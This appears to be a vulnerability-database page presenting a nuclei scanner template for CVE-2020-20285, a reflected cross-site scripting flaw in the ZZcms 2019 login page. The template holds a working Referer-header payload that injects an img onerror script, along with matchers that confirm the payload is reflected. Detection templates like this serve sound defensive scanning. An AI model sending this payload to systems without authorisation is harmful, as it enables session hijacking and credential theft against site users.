Lucene search
+L

ZZcms - Cross-Site Scripting

🗓️ 18 Jul 2026 08:12:59Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

ZZcms 2019 Cross-Site Scripting vulnerability in user login page. Allows injection of arbitrary JavaScript via Referer header in user/login.php, leading to theft of credentials & subsequent attacks

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-20285
18 Dec 202022:44
circl
CNNVD
ZZCMS 跨站脚本漏洞
18 Dec 202000:00
cnnvd
CNVD
zzcms cross-site scripting vulnerability (CNVD-2020-73162)
21 Dec 202000:00
cnvd
CVE
CVE-2020-20285
18 Dec 202018:20
cve
Cvelist
CVE-2020-20285
18 Dec 202018:20
cvelist
EUVD
EUVD-2020-13072
7 Oct 202500:30
euvd
NVD
CVE-2020-20285
18 Dec 202019:15
nvd
OSV
CVE-2020-20285
18 Dec 202019:15
osv
Prion
Code injection
18 Dec 202019:15
prion
RedhatCVE
CVE-2020-20285
22 May 202515:17
redhatcve
Rows per page
id: CVE-2020-20285

info:
  name: ZZcms - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: |
    ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md
    - https://nvd.nist.gov/vuln/detail/CVE-2020-20285
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2020-20285
    cwe-id: CWE-79
    epss-score: 0.01395
    epss-percentile: 0.69333
    cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zzcms
    product: zzcms
    fofa-query: zzcms
  tags: cve2020,cve,zzcms,xss,vuln

http:
  - raw:
      - |
        GET /user/login.php HTTP/1.1
        Host: {{Hostname}}
        Referer: xss"/><img src="#" onerror="alert(document.domain)"/>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'fromurl" type="hidden" value="xss"/><img src="#" onerror="alert(document.domain)"/>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022020fc1ec467bb2c71c9a9bb324fed2d438ccccf94adfd8a0a332f757f64000fcb022024b18143b451fa667cb49a803dcbefb93468b5bf619dce7a8b74b169949c93b4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 23.5
CVSS 3.15.4
EPSS0.01395
29